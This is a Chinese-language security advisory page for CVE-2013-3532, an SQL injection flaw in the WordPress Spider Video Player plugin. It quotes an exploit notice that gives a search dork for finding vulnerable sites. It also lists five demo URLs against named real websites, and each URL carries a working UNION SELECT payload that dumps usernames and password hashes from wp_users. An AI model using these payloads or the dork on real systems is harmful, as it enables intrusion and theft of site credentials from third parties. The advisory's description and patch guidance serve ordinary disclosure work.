首页 -> 安全研究

安全研究

安全漏洞
WordPress Spider Video Player插件'theme'参数SQL注入漏洞

发布日期:2013-04-11
更新日期:2013-04-12

受影响系统:
WordPress Spider Video Player < 2.1
描述:
BUGTRAQ  ID: 59021
CVE(CAN) ID: CVE-2013-3532

WordPress Spider Video Player是视频播放器插件。

Spider Video Player 2.1存在SQL注入漏洞,攻击者可利用此漏洞执行未授权数据库操作。

<*来源:Ashiyane Digital Security Team
  
  链接:http://packetstormsecurity.com/files/121250/WordPress-Spider-Video-Player-2.1-SQL-Injection.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##############
# Exploit Title : Wordpress Spider Video Player plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link  : http://web-dorado.com/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 2.1
#
# Dork : inurl:wp-content/plugins/player/settings.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
#
#
#DEm0:
# http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############

建议:
厂商补丁:

WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://wordpress.org/extend/plugins/player/

浏览次数:5561
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障